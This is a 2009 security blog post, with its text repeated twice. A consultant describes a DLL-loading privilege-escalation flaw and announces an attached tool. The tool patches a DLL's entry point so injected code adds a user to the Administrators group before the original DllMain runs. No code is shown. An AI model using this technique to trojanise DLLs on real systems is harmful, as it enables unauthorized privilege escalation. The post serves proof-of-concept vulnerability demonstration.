REBlog
October 23rd, 2009, 16:20
In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability.
Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker ("http://cwe.mitre.org/data/definitions/426.html"). An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user.
Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own.
The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) ("http://msdn.microsoft.com/en-us/library/aa370436(VS.85).aspx") from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load.
The patcher is compatible with both 32-bit and 64-bit DLLs.
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you encounter any problems or have any questions.
Attachment(s): DllPatcher.zip
http://malwareanalysis.com/CommunityServer/blogs/geffner/attachment/992.ashx
http://malwareanalysis.com/CommunityServer/blogs/geffner/archive/2009/10/23/992.aspx
Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker ("http://cwe.mitre.org/data/definitions/426.html"). An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user.
Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own.
The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) ("http://msdn.microsoft.com/en-us/library/aa370436(VS.85).aspx") from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load.
The patcher is compatible with both 32-bit and 64-bit DLLs.
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you encounter any problems or have any questions.
Attachment(s): DllPatcher.zip
http://malwareanalysis.com/CommunityServer/blogs/geffner/attachment/992.ashx
http://malwareanalysis.com/CommunityServer/blogs/geffner/archive/2009/10/23/992.aspx